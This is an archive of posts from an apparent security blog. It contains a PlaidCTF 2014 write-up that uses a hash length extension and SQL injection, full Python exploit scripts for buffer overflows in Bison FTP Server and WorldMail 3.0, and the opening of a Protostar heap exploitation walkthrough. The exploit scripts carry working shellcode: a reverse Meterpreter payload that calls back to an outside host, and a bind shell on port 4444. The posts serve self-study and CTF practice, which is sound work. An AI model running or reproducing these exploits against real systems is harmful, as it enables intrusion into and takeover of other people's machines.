Author Archives: 0xconceptofproof

PlaidCTF 2014 Web.150 MtGox Writeup

Screen Shot 2014-04-13 at 9.22.46 PM

This challenge consists of 2 parts: an authentication bypass and a SQL injection.

When we try to visit the admin page on the given website we get the message, “Sorry, not authorized.”
Viewing the document source didn’t reveal much.

In order to obtain the raw PHP source code of this page we append “?page=admin.php” to the end of the URL to get “http://54.211.6.40/index.php?page=admin.php “.

After doing that and viewing the source code this is what we see:

<?php
  require_once("secrets.php");
  $auth = false;
  if (isset($_COOKIE["auth"])) {
     $auth = unserialize($_COOKIE["auth"]);
     $hsh = $_COOKIE["hsh"];
     if ($hsh !== hash("sha256", $SECRET . strrev($_COOKIE["auth"]))) {
       $auth = false;
     }
  }
  else {
    $auth = false;
    $s = serialize($auth);
    setcookie("auth", $s);
    setcookie("hsh", hash("sha256", $SECRET . strrev($s)));
  }
  if ($auth) {
    if (isset($_GET['query'])) {
      $link = mysql_connect('localhost', $SQL_USER, $SQL_PASSWORD) or die('Could not connect: ' . mysql_error());
      mysql_select_db($SQL_DATABASE) or die('Could not select database');
      $qstr = mysql_real_escape_string($_GET['query']);
      $query = "SELECT amount FROM plaidcoin_wallets WHERE id=$qstr";
      $result = mysql_query($query) or die('Query failed: ' . mysql_error());
      $line = mysql_fetch_array($result, MYSQL_ASSOC);
      foreach ($line as $col_value) {
        echo "Wallet " . $_GET['query'] . " contains " . $col_value . " coins.";
      }
    } else {
       echo "<html><head><title>MtPOX Admin Page</title></head><body>Welcome to the admin panel!<br /><br /><form name='input' action='admin.php' method='get'>Wallet ID: <input type='text' name='query'><input type='submit' value='Submit Query'></form></body></html>";
    }
  }
  else echo "Sorry, not authorized.";
?>

So apparently our cookie consists of 2 parts: an auth value and a hsh value. And a secret is prepended to the auth string reversed before the result is used to create a SHA256 hash.

This is what our cookie looks like in Burp:
Screen Shot 2014-04-13 at 3.38.42 AM

After doing some research I discovered I could perform a hash length extension attack on this application.

Before this challenge I had never heard of hash length extension attacks and since this is a writeup for the challenge, and not a hash length extension attack tutorial I won’t go too much into the details. But all you need to know is that given an application that prepends a secret to a string before hashing it, the application is vulnerable if an attacker knows the string, the hash and the length of the secret. The actual value of the secret is not needed to perform this attack. The attacker is able to append extra information to the original string and still generate a valid hash from it without knowing the secret. Usually the new string will require extra padding as different hash algorithms require input lengths to be multiples of a certain number. Also, it’s important to note that in a query the extra data that is appended is given preference over the original data. To learn more about hash length extension attacks please refer to this article.

Essentially what we want to do is set the auth value to b=1; and generate a valid hash from the new string that has b=1; appended to it.

To do this I used hash pump:

root@bt:~/HashPump# ./hashpump -d ";0:b" -a ";1:b" -s ef16c2bffbcf0b7567217f292f9c2a9a50885e01e002fa34db34c0bb916ed5c3 -k 8
967ca6fa9eacfe716cd74db1b1db85800e451ca85d29bd27782832b9faa16ae1
;0:b\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00`;1:b

Note that in the ‘about’ page on the site we are told that the length of the secret is 8 bytes.
This is necessary to obtain the value of the last byte of padding!
The newly generated signature/hash is 967ca6fa9eacfe716cd74db1b1db85800e451ca85d29bd27782832b9faa16ae1 and the new string w/padding is ;0:b\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00`;1:b

Next, we have to URL encode the new string in order for the application to parse it properly.
To do this I made a quick PHP script:

<?php
print urlencode(strrev(";0:b\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00`;1:b"));
?>

Notice that we have to reverse the string first before URL encoding because we want ;0:b to be in the beginning of our string and in the if statement where the hash is being validated, the string is reversed before it is hashed:

if ($hsh !== hash("sha256", $SECRET . strrev($_COOKIE["auth"])))

This gives us the following result which we will plug in as our new auth value in our cookie:

root@bt:~/pctf14# php auth.php 
b%3A1%3B%60%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B

With our new cookie we are able to bypass authentication and get to this page:
Screen Shot 2014-04-13 at 3.16.45 PM

After this, we must perform a SQL injection to leak the amount of coins.
Even though the mysql_real_escape_string() function in the PHP source code performs some sanitization, it is still vulnerable to 1 OR 1=1
Screen Shot 2014-04-13 at 3.26.58 PM

Finally we perform another SQL injection, this time using the UNION operator to leak the id of the entry in the table that has all these coins.
Screen Shot 2014-04-13 at 3.30.45 PM

The flag is flag{phpPhPphpPPPphpcoin}

Big thanks to chuckleberry for helping me out and to PPP for hosting an awesome CTF competition!

Egghunting for Fun and Profit w/ Bison FTP Server

Often times when we are writing exploits, we find there isn’t enough buffer space given to us to store our shellcode in. In these situations, we must store our shellcode in some other memory region and jump to the location, but sometimes this is easier said than done. Perhaps our shellcode is stored in a distant address that requires a 5 byte jump to access or perhaps .
In this post, I will be going over egghunting, which is a commonly used solution to overcome these limitations.
Please note that it is of course, not the only solution.
I have overcome these limitations in my previous posts using other techniques but for the sake of education and learning this technique I will be utilizing an egghunter to write my exploit on the Bison FTP Server.

For the uninitiated, egghunting is a technique employed by exploit developers that involves using a unique key or an egg, to search
a process’s virtual address space for shellcode stored in some other memory region. In order to find and execute the shellcode, it is “tagged” by prepending the shellcode with the 4-byte egg repeated twice. For example, if the egg is “w00t” then the egghunter searches for the string “w00tw00t”. “Why is the egg repeated twice?”, you ask? For optimization purposes. Having to search for 1 unique DWORD repeated twice allows the egghunter to be smaller than if it had to search for 2 unique DWORDs.

If you would like to learn more about egghunting, I highly recommend you read Corelan’s tutorial or Skape’s original paper.

Now that we understand the basic concept of egghunting, let’s get started.

After fuzzing the Bison FTP Server application, I found it crashed when making a directory of about 1800 bytes.

Next, I began making my exploit by sending it a unique 2000-byte pattern generated by Metasploit and finding the offsets of the registers
using mona.py.

Bison Pattern

As a side note, after familiarizing myself more with mona.py, I am now truly convinced that it is indeed, the swiss army knife for exploit developers. We will see why in this post as we continue making our exploit.

Looking at our log file, we see that our EIP exists at offset 1428 so we can assume that we can control EIP by padding the beginning of our buffer with 1428 bytes. I tested this out using “babecafe” as my return address:

#!/usr/bin/python
import sys
import socket

addr = ("192.168.11.22", 21)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

buffer = "A"*1428 + "\xba\xbe\xca\xfe" + "B"*568

s.connect(addr)
s.recv(1024)
s.send('USER ftp\r\n')
s.recv(1024)
s.send('PASS ftp\r\n')
s.recv(1024)
s.send("MKD "+buffer+"\r\n")
s.close()

And sure enough, when we send this code we see that EIP is overwritten with our DWORD in 2’s compliment form:

Bison EIP

Now that we have control over EIP, where do we direct it to?
Since we will be egghunting, the first stage of our payload will be to jump to our egghunter.
Let’s generate our egghunter code with mona.py using “w00t” as our egg so we know how much space we’ll need to store it in our payload.

bison egg generate

Looks like we’ll only be needing 32 bytes. After examining the other registers and seeing which ones were also overwritten by our buffer when it was sent, I found that the EDX register was a good place to store our egghunter. As we saw in our log earlier, the EDX register exists at offset 1024. That is where we will be placing our egg hunter.

Now that we know where to direct EIP to, we must find a JMP EDX instruction loaded in some non-ASLR enabled module in our process that exists at an address without any null bytes. Again, mona.py makes this search a painless process.

Bison Find JMP EDX

If we examine our log.txt file, we can view the rest of the results:

Bison Find JMP EDX 2

I just chose the first CALL EDX instruction that didn’t start with null-bytes. It does the same thing as JMP EDX essentially. The address of that instruction is 0x7c87a0be

Now let’s begin the second stage of our exploit. We must now generate our shellcode and store it somewhere in our payload.
Let’s figure out how much space we have to work with.

After looking around a bit in Immunity I noticed that the end of our payload was getting cut off, leaving me only about 90 bytes of buffer space post-EIP to work with. Clearly that isn’t enough. The beginning of our buffer looks ideal though. Our egghunter exists at an offset of 1024 bytes so we have 1024 bytes to use for our shellcode if we place it at the beginning of our buffer. That should probably be enough space.

Using msfpayload to create reverse Meterpreter session shellcode and piping it to msfencode to remove any bad chars, I found I only needed 317 bytes for my desired shellcode. Perfect.

By the way, for those unfamiliar with Meterpreter it is essentially a shell on steroids. It is a staged, advanced payload that supports many useful dynamic exploitation and post-exploitation functions. Very useful for penetration testers and my personal favorite payload in the Metasploit Framework.

Now that we have gathered all the essential parts of our buffer, all that’s left to do now is to tag the shellcode by prepending it with our 4-byte egg repeated twice, and padding the rest of the space to ensure the functionality of our payload.

My final exploit script looks like this:

#!/usr/bin/python
import sys
import socket

addr = ("192.168.11.22", 21)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

#egg is "w00t"
#egghunter is 32 bytes
egghunter =("\x66\x81\xca\xff"
            "\x0f\x42\x52\x6a"
            "\x02\x58\xcd\x2e"
            "\x3c\x05\x5a\x74"
            "\xef\xb8\x77\x30"#w0
            "\x30\x74\x8b\xfa"#0t
            "\xaf\x75\xea\xaf"
            "\x75\xe7\xff\xe7")

#Reverse Meterpreter to 192.168.10.107 port 1337 Shellcode. Size = 317 bytes.
shellcode =("\xdd\xc2\xbd\x6f\x6f\x1f\xb8\xd9\x74\x24\xf4\x5e\x33\xc9"
"\xb1\x49\x83\xc6\x04\x31\x6e\x15\x03\x6e\x15\x8d\x9a\xe3"
"\x50\xd8\x65\x1c\xa1\xba\xec\xf9\x90\xe8\x8b\x8a\x81\x3c"
"\xdf\xdf\x29\xb7\x8d\xcb\xba\xb5\x19\xfb\x0b\x73\x7c\x32"
"\x8b\xb2\x40\x98\x4f\xd5\x3c\xe3\x83\x35\x7c\x2c\xd6\x34"
"\xb9\x51\x19\x64\x12\x1d\x88\x98\x17\x63\x11\x99\xf7\xef"
"\x29\xe1\x72\x2f\xdd\x5b\x7c\x60\x4e\xd0\x36\x98\xe4\xbe"
"\xe6\x99\x29\xdd\xdb\xd0\x46\x15\xaf\xe2\x8e\x64\x50\xd5"
"\xee\x2a\x6f\xd9\xe2\x33\xb7\xde\x1c\x46\xc3\x1c\xa0\x50"
"\x10\x5e\x7e\xd5\x85\xf8\xf5\x4d\x6e\xf8\xda\x0b\xe5\xf6"
"\x97\x58\xa1\x1a\x29\x8d\xd9\x27\xa2\x30\x0e\xae\xf0\x16"
"\x8a\xea\xa3\x37\x8b\x56\x05\x48\xcb\x3f\xfa\xec\x87\xd2"
"\xef\x96\xc5\xba\xdc\xa4\xf5\x3a\x4b\xbf\x86\x08\xd4\x6b"
"\x01\x21\x9d\xb5\xd6\x46\xb4\x01\x48\xb9\x37\x71\x40\x7e"
"\x63\x21\xfa\x57\x0c\xaa\xfa\x58\xd9\x7c\xab\xf6\xb2\x3c"
"\x1b\xb7\x62\xd4\x71\x38\x5c\xc4\x79\x92\xf5\x6e\x83\x75"
"\x3a\xc6\x81\xee\xd2\x14\x96\xf5\x1b\x91\x70\x9f\x4b\xf7"
"\x2b\x08\xf5\x52\xa7\xa9\xfa\x49\xcd\xea\x71\x7d\x31\xa4"
"\x71\x08\x21\x51\x72\x47\x1b\xf4\x8d\x72\x36\xf9\x1b\x78"
"\x91\xae\xb3\x82\xc4\x99\x1b\x7d\x23\x92\x92\xeb\x8c\xcd"
"\xda\xfb\x0c\x0e\x8d\x91\x0c\x66\x69\xc1\x5e\x93\x76\xdc"
"\xf2\x08\xe3\xde\xa2\xfd\xa4\xb6\x48\xdb\x83\x19\xb2\x0e"
"\x12\x66\x65\x77\x90\x9e\x03\x9b\x58")

#buffer is 2000 bytes
#eip offset 1428
#edx offset 1024
#call edx - 0x7c87a0be

buffer = "w00tw00t"+shellcode+"A"*699+egghunter+"\x90"*372+ "\xbe\xa0\x87\x7c" + "B"*568

s.connect(addr)
s.recv(1024)
s.send('USER ftp\r\n')
s.recv(1024)
s.send('PASS ftp\r\n')
s.recv(1024)

print "[*] Sending evil buffer..."
s.send("MKD "+buffer+"\r\n")
s.close()
print "[*] Buffer successfully sent! Reverse Meterpreter shell now opening on port 1337!"

Excellent. Now let’s open up a handler using Metasploit so that we can accept our incoming payload and send our exploit to our Bison FTP Server…

Bison Exploit Sent

Take a look at what happens on our handler:

Meterpreter Handler

So as we can see, our exploit was successful and a Meterpreter session opened up for us allowing us to perform a whole host of different attacks. We can now easily dump user hashes, install trojans, install key-loggers, drop into a shell, etc.

Awesome.

WorldMail v3.0 SEH Overflow Exploit

WorldMail 3.0 is a mail server application for Windows that contains a publicly known buffer overflow vulnerability.

I attempted this as an exercise to brush up on my SEH overflow skillz and figured this would be a good example to use in an SEH overflow tutorial as promised in my last post.

If you would like to try this exploit out for yourself, you can download the software from this site: http://www.eudora.com/download/worldmail/3.0/

Before I begin the exploit, let’s first go over what Structured Exception Handlers are.

SEH records are stored in a singularly linked list called the SEH chain, the head of which, is located at a data structure known as the Thread Environment Block (TEB) or FS:[0]. The TEB stores information on the current thread and is always pointed to by FS. The following describes the structure of a SEH record:


typedef struct _EXCEPTION_REGISTRATION_RECORD
{
    struct _EXCEPTION_REGISTRATION_RECORD *Next;
    EXCEPTION_DISPOSITION (*Handler)(
            struct _EXCEPTION_RECORD *record,
            void *frame,
            struct _CONTEXT *ctx,
            void *dispctx);
} EXCEPTION_REGISTRATION_RECORD, *PEXCEPTION_REGISTRATION_RECORD;

Each SEH record consists of two DWORD pointers. The first pointer points to the next SEH record and the second pointer points to the exception handler code for that particular record. The end of the SEH chain is denoted when the pointer to the next SEH record is 0xFFFFFFFF.

When a process runs and an exception occurs, Windows ntdll.dll is called and the Operating System traverses the SEH chain looking for the correct exception handler to call. If it reaches the end of the SEH chain and has not found the appropriate handler, it calls the default Windows exception handler which, depending on your operating system, may look like this:

Screen Shot 2016-05-11 at 2.25.53 PM

Structured Exception Handlers (SEH) are useful attack vectors for exploit developers. On non-SafeSEH enabled processes and dlls, SEHs can be exploited to bypass memory protection mechanisms such as stack cookies in order to achieve arbitrary code execution.

If you would like a more comprehensive guide to learn about SEH-based exploits, I highly recommend you check out Corelan’s tutorial.

Now that we have a basic understanding of how Windows exception handling works, let’s begin our work on the WorldMail software.

After fuzzing the service, I noticed that it crashed when it receives a buffer of about length 1500 bytes placed in between the strings “a001 LIST ” and “}”.

I then sent it a unique pattern of 1500 bytes and found that the pointer to the next SEH record exists at an offset of 770 bytes from the beginning of the buffer.

pattern_offset.rb

Knowing this, I figured I could overwrite the NSEH by appending 4 bytes immediately after the 770 filler bytes, as well as the exception handler by appending another 4 bytes after that.
I tested this out by beginning my exploit script:

#!/usr/bin/python

import socket
import sys

char = '}'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

#770 bytes to ptr to next SEH record
#payload is 1500 bytes
#b is pointer to NSEH
#c is exception handler
payload = &quot;\x90&quot;*770 + &quot;B&quot;*4 + &quot;C&quot;*4 + &quot;D&quot;*722

s.connect((sys.argv[1],int(sys.argv[2])))
data=s.recv(1024)
s.send('a001 LIST ' + payload + char +'\r\n')
s.close()

This is what my SEH chain looked like after running it:

SEH_Chain

As we can see, the pointer to the next SEH was overwritten with 4 “B”s or in hex, 0x42424242 and our exception handler now points to address 0x43434343 which is hex for 4 “C”s. Perfect.

Now that we have confirmed we have control over the NSEH and exception handler, what do we overwrite these address with?

The traditional approach is to overwrite the pointer to the next structured exception handler record with a jmp instruction into our shellcode and overwrite the pointer to the exception handler with the address of a pop-pop-ret instruction.

We must find the address of a pop-pop-ret instruction somewhere in our process because performing these instructions would return whatever is stored in the pointer to the next SEH record into EIP, which in our case, is a jmp instruction into our shellcode. There are some limitations, however. The address of the pop-pop-ret instruction cannot contain any nullbytes, and it must be derived from a non-ASLR and non-SafeSEH enabled module.

For the uninitiated, SafeSEH is an exploit mitigation technology that is supposed to prevent SEH overflow exploits (emphasis on the “supposed to”). If a module is compiled with SafeSEH, it maintains a list of known addresses than can be used as exception handler functions. At run-time, if an exception from a SafeSEH-enabled module is called, the system checks to see if the exception points to an entry in its list of known addresses before executing the exception handling routine. If it does not, the process terminates and the exception handling routine is never executed.

Mona.py greatly simplifies the process of finding a pop-pop-ret instruction that meets all of these requirements as we can see here:

!mona seh -n

For my exploit, I just chose the first instruction which is located at 0x600429de.

Next, I determined the opcodes for the jmp instruction using metasm:
metasm_jmp_6

2 bytes for the remainder of the NSEH DWORD and 4 bytes for the exception handler DWORD.

Canonically, the shellcode is supposed to be placed immediately after the overwritten exception handler and you are supposed to overwrite the pointer to the NSEH with a jmp 6 instruction in order to execute the shellcode. This is where I ran into a problem.
Initially, my payload looked something like this:

#!/usr/bin/python

import socket
import sys

char = '}'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

#Windows Bind Shell Shellcode Port=4444 Size=344
shellcode = (&quot;\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xcc&quot;
&quot;\x55\x8f\x48\x83\xeb\xfc\xe2\xf4\x30\x3f\x64\x05\x24\xac\x70\xb7&quot;
&quot;\x33\x35\x04\x24\xe8\x71\x04\x0d\xf0\xde\xf3\x4d\xb4\x54\x60\xc3&quot;
&quot;\x83\x4d\x04\x17\xec\x54\x64\x01\x47\x61\x04\x49\x22\x64\x4f\xd1&quot;
&quot;\x60\xd1\x4f\x3c\xcb\x94\x45\x45\xcd\x97\x64\xbc\xf7\x01\xab\x60&quot;
&quot;\xb9\xb0\x04\x17\xe8\x54\x64\x2e\x47\x59\xc4\xc3\x93\x49\x8e\xa3&quot;
&quot;\xcf\x79\x04\xc1\xa0\x71\x93\x29\x0f\x64\x54\x2c\x47\x16\xbf\xc3&quot;
&quot;\x8c\x59\x04\x38\xd0\xf8\x04\x08\xc4\x0b\xe7\xc6\x82\x5b\x63\x18&quot;
&quot;\x33\x83\xe9\x1b\xaa\x3d\xbc\x7a\xa4\x22\xfc\x7a\x93\x01\x70\x98&quot;
&quot;\xa4\x9e\x62\xb4\xf7\x05\x70\x9e\x93\xdc\x6a\x2e\x4d\xb8\x87\x4a&quot;
&quot;\x99\x3f\x8d\xb7\x1c\x3d\x56\x41\x39\xf8\xd8\xb7\x1a\x06\xdc\x1b&quot;
&quot;\x9f\x06\xcc\x1b\x8f\x06\x70\x98\xaa\x3d\x9e\x14\xaa\x06\x06\xa9&quot;
&quot;\x59\x3d\x2b\x52\xbc\x92\xd8\xb7\x1a\x3f\x9f\x19\x99\xaa\x5f\x20&quot;
&quot;\x68\xf8\xa1\xa1\x9b\xaa\x59\x1b\x99\xaa\x5f\x20\x29\x1c\x09\x01&quot;
&quot;\x9b\xaa\x59\x18\x98\x01\xda\xb7\x1c\xc6\xe7\xaf\xb5\x93\xf6\x1f&quot;
&quot;\x33\x83\xda\xb7\x1c\x33\xe5\x2c\xaa\x3d\xec\x25\x45\xb0\xe5\x18&quot;
&quot;\x95\x7c\x43\xc1\x2b\x3f\xcb\xc1\x2e\x64\x4f\xbb\x66\xab\xcd\x65&quot;
&quot;\x32\x17\xa3\xdb\x41\x2f\xb7\xe3\x67\xfe\xe7\x3a\x32\xe6\x99\xb7&quot;
&quot;\xb9\x11\x70\x9e\x97\x02\xdd\x19\x9d\x04\xe5\x49\x9d\x04\xda\x19&quot;
&quot;\x33\x85\xe7\xe5\x15\x50\x41\x1b\x33\x83\xe5\xb7\x33\x62\x70\x98&quot;
&quot;\x47\x02\x73\xcb\x08\x31\x70\x9e\x9e\xaa\x5f\x20\x3c\xdf\x8b\x17&quot;
&quot;\x9f\xaa\x59\xb7\x1c\x55\x8f\x48&quot;)

#770 bytes to ptr to next SEH record
#payload is 1500 bytes
nseh = &quot;\xeb\x04\x90\x90&quot; #jmp 6
seh = &quot;\xde\x29\x04\x60&quot; #pop-pop-ret

payload = &quot;\x90&quot;*770  + nseh + seh + shellcode + &quot;A&quot;*378

s.connect((sys.argv[1],int(sys.argv[2])))
data=s.recv(1024)
s.send('a001 LIST ' + payload + char +'\r\n')
s.close()

However, I tried this out and it didn’t work. Why? Because I had run out of room on the stack and my shellcode was getting cut off.
To avoid this, I realized I had to place my shellcode before the corrupted SEH record and do a backwards jmp instead of a forward jmp.

I changed my payload to look like this:

nseh = &quot;\xe9\x6b\xfe\xff\xff&quot; #long jmp $-400
seh = &quot;\xde\x29\x04\x60&quot; #pop-pop-ret

#770 bytes to ptr to next SEH record
#buffer is 1500 bytes
payload = &quot;\x90&quot;*426 + shellcode + nseh + seh + &quot;A&quot;*721

So again, I tried…and again failed. Why? I realized later that the pointer to the next SEH was limited to a DWORD (4 bytes) so I was essentially overwriting my pop-pop-ret address with an extra byte because my long backwards jmp was 5 bytes long. Instead, I had to overwrite the pointer to the NSEH with a short backwards jmp…into a long backwards jmp into my shellcode.

I’ve drawn out a diagram to make this clearer:

SEH Overflow Diagram

So this is my final exploit script:

#!/usr/bin/python

import socket
import sys

char = '}'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

#Windows Bind Shell Shellcode Port=4444 Size=344
shellcode = (&quot;\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xcc&quot;
&quot;\x55\x8f\x48\x83\xeb\xfc\xe2\xf4\x30\x3f\x64\x05\x24\xac\x70\xb7&quot;
&quot;\x33\x35\x04\x24\xe8\x71\x04\x0d\xf0\xde\xf3\x4d\xb4\x54\x60\xc3&quot;
&quot;\x83\x4d\x04\x17\xec\x54\x64\x01\x47\x61\x04\x49\x22\x64\x4f\xd1&quot;
&quot;\x60\xd1\x4f\x3c\xcb\x94\x45\x45\xcd\x97\x64\xbc\xf7\x01\xab\x60&quot;
&quot;\xb9\xb0\x04\x17\xe8\x54\x64\x2e\x47\x59\xc4\xc3\x93\x49\x8e\xa3&quot;
&quot;\xcf\x79\x04\xc1\xa0\x71\x93\x29\x0f\x64\x54\x2c\x47\x16\xbf\xc3&quot;
&quot;\x8c\x59\x04\x38\xd0\xf8\x04\x08\xc4\x0b\xe7\xc6\x82\x5b\x63\x18&quot;
&quot;\x33\x83\xe9\x1b\xaa\x3d\xbc\x7a\xa4\x22\xfc\x7a\x93\x01\x70\x98&quot;
&quot;\xa4\x9e\x62\xb4\xf7\x05\x70\x9e\x93\xdc\x6a\x2e\x4d\xb8\x87\x4a&quot;
&quot;\x99\x3f\x8d\xb7\x1c\x3d\x56\x41\x39\xf8\xd8\xb7\x1a\x06\xdc\x1b&quot;
&quot;\x9f\x06\xcc\x1b\x8f\x06\x70\x98\xaa\x3d\x9e\x14\xaa\x06\x06\xa9&quot;
&quot;\x59\x3d\x2b\x52\xbc\x92\xd8\xb7\x1a\x3f\x9f\x19\x99\xaa\x5f\x20&quot;
&quot;\x68\xf8\xa1\xa1\x9b\xaa\x59\x1b\x99\xaa\x5f\x20\x29\x1c\x09\x01&quot;
&quot;\x9b\xaa\x59\x18\x98\x01\xda\xb7\x1c\xc6\xe7\xaf\xb5\x93\xf6\x1f&quot;
&quot;\x33\x83\xda\xb7\x1c\x33\xe5\x2c\xaa\x3d\xec\x25\x45\xb0\xe5\x18&quot;
&quot;\x95\x7c\x43\xc1\x2b\x3f\xcb\xc1\x2e\x64\x4f\xbb\x66\xab\xcd\x65&quot;
&quot;\x32\x17\xa3\xdb\x41\x2f\xb7\xe3\x67\xfe\xe7\x3a\x32\xe6\x99\xb7&quot;
&quot;\xb9\x11\x70\x9e\x97\x02\xdd\x19\x9d\x04\xe5\x49\x9d\x04\xda\x19&quot;
&quot;\x33\x85\xe7\xe5\x15\x50\x41\x1b\x33\x83\xe5\xb7\x33\x62\x70\x98&quot;
&quot;\x47\x02\x73\xcb\x08\x31\x70\x9e\x9e\xaa\x5f\x20\x3c\xdf\x8b\x17&quot;
&quot;\x9f\xaa\x59\xb7\x1c\x55\x8f\x48&quot;)

nseh = &quot;\xeb\xf4\x90\x90&quot; #short jmp $-10
longjmp = &quot;\xe9\x6b\xfe\xff\xff&quot; #long jmp $-400
seh = &quot;\xde\x29\x04\x60&quot; #pop-pop-ret

#770 bytes to ptr to next SEH record
#buffer is 1500 bytes
payload = &quot;\x90&quot;*409 + shellcode + &quot;\x90&quot;*12 + longjmp + nseh + seh + &quot;A&quot;*722

s.connect((sys.argv[1],int(sys.argv[2])))
data=s.recv(1024)
print '[*] sending evil payload...'
s.send('a001 LIST ' + payload + char +'\r\n')
print '[*] payload sent! bind shell opened on port 4444'
s.close()

And just like that, we have a shell!

Bind_Shell

SEH Exploit Tutorial (coming soon…)

So, I was able to play around with Immunity Dbg + Mona (thank you team Corelan) yesterday and today after reading a lot of articles online.
I’ve also been learning about SEH overflows and how they can be used to bypass stack canaries to achieve arbitrary code execution.
Unfortunately, I will be pretty busy these upcoming weeks due to finals and what not so I likely won’t have the time to write a full in-depth guide until after school ends. =(

But for now I just thought I’d post a little preview of what is to come…

SEH Exception Handler Tutorial Preview
(note the corrupted SEH records)

Yep, using a SEH overflow exploit I was able to spawn a calculator from a software crash! Exciting stuff, I know.

I plan on posting an in-depth guide using one of the Snort AWBO challenges as an example. Hopefully I’ll get the chance to tackle it soon.

-JW

Protostar Heap3 Walkthrough

Up until now we have seen how we can leverage buffer overflow vulnerabilities to perform stack-based memory corruption exploits (hence the name “SmashTheStack”). But what about the heap? Can it be exploited too to achieve arbitrary code execution? Absolutely.

Admittedly, generating heap overflows is a lot more challenging than generating stack overflows, or at least it was for me when I did this exercise because you have to think about how to leverage doubly-linked lists in order to redirect the flow of execution instead of just trying to overwrite the return address (EIP) of a stack frame. Before proceeding, I highly recommend reading Vudo Malloc Tricks by MaXX (section 3.6) and Exploiting the Wilderness by Phantasmal Phantasmagoria as they present overviews of heap overflows that are extremely pertinent to this exercise.

The heap is used for dynamic allocation and every OS has its own heap allocator. So the way you exploit a heap allocator is dependent on the implementation of the heap allocator on the system or program. Protostar Heap3 specifically uses a general purpose memory allocator called Dlmalloc (Doug Lea’s Malloc) and the goal of the exercise it to essentially break it. For the uninitiated, I will present a brief overview of how Dlmalloc works as understanding it is critical to completing this exercise. If you would like a more comprehensive description of how it works I would recommend you peruse Dr. Lea’s original article.

Dlmalloc perceives the heap as a series of different chunks. The last chunk at the highest address of the heap is a special chunk called the wilderness chunk. The address at the very end of the heap, or the top of the wilderness chunk, is known as the program break. The heap can expand if necessary by calling brk() and sbrk() to increase the value of the program break. Each chunk can either be allocated or free. Allocated chunks look like the following (taken from MaXX’s article):

    chunk -> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
             | prev_size: size of the previous chunk, in bytes (used   |
             | by dlmalloc only if this previous chunk is free)        |
             +---------------------------------------------------------+
             | size: size of the chunk (the number of bytes between    |
             | "chunk" and "nextchunk") and 2 bits status information  |
      mem -> +---------------------------------------------------------+
             | fd: not used by dlmalloc because "chunk" is allocated   |
             | (user data therefore starts here)                       |
             + - - - - - - - - - - - - - - - - - - - - - - - - - - - - +
             | bk: not used by dlmalloc because "chunk" is allocated   |
             | (there may be user data here)                           |
             + - - - - - - - - - - - - - - - - - - - - - - - - - - - - +
             |                                                         .
             .                                                         .
             . user data (may be 0 bytes long)                         .
             .                                                         .
             .                                                         |
nextchunk -> + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
             | prev_size: not used by dlmalloc because "chunk" is      |
             | allocated (may hold user data, to decrease wastage)     |
             +---------------------------------------------------------+

And free chunks look like this:

    chunk -> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
             | prev_size: may hold user data (indeed, since "chunk" is |
             | free, the previous chunk is necessarily allocated)      |
             +---------------------------------------------------------+
             | size: size of the chunk (the number of bytes between    |
             | "chunk" and "nextchunk") and 2 bits status information  |
      mem -> +---------------------------------------------------------+
             | fd: forward pointer to the next chunk in the circular   |
             | doubly-linked list (not to the next _physical_ chunk)   |
             +---------------------------------------------------------+
             | bk: back pointer to the previous chunk in the circular  |
             | doubly-linked list (not the previous _physical_ chunk)  |
             +---------------------------------------------------------+
             |                                                         .
             .                                                         .
             . unused space (may be 0 bytes long)                      .
             .                                                         .
             .                                                         |
nextchunk -> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
             | prev_size: size of "chunk", in bytes (used by dlmalloc  |
             | because this previous chunk is free)                    |
             +---------------------------------------------------------+

As we can see, each chunk regardless of if it is free or not, is composed of an area that can store user data and another area that stores four 4-byte fields of metadata information (prev_size, size, fd, bk). Mem is simply the address that’s returned to the user when a Malloc() function is called to dynamically allocate memory. If a chunk is free then Dlmalloc uses a process called binning to store its free chunks in doubly linked lists and so each free chunk’s fd and bk pointer point to the next and previous free chunk in its doubly linked list. Bins exist in memory as an array of pointers to a linked list. The fd and bk fields are only used if the chunk itself is free. If it is allocated, then user data can be used in place of the fd and bk pointers. Also the previous size field of a chunk is only used if the previous chunk is free. Otherwise the previous chunk can use it to store user data.

An important detail to remember is that the lowest bit of the size field specifies whether or not the previous chunk is allocated or free. If it is set to 1, then the previous chunk is allocated. If it is set to 0, then the previous chunk is free. Similarly, the next lowest bit of the size field specifies whether or not the chunk was allocated via mmap.

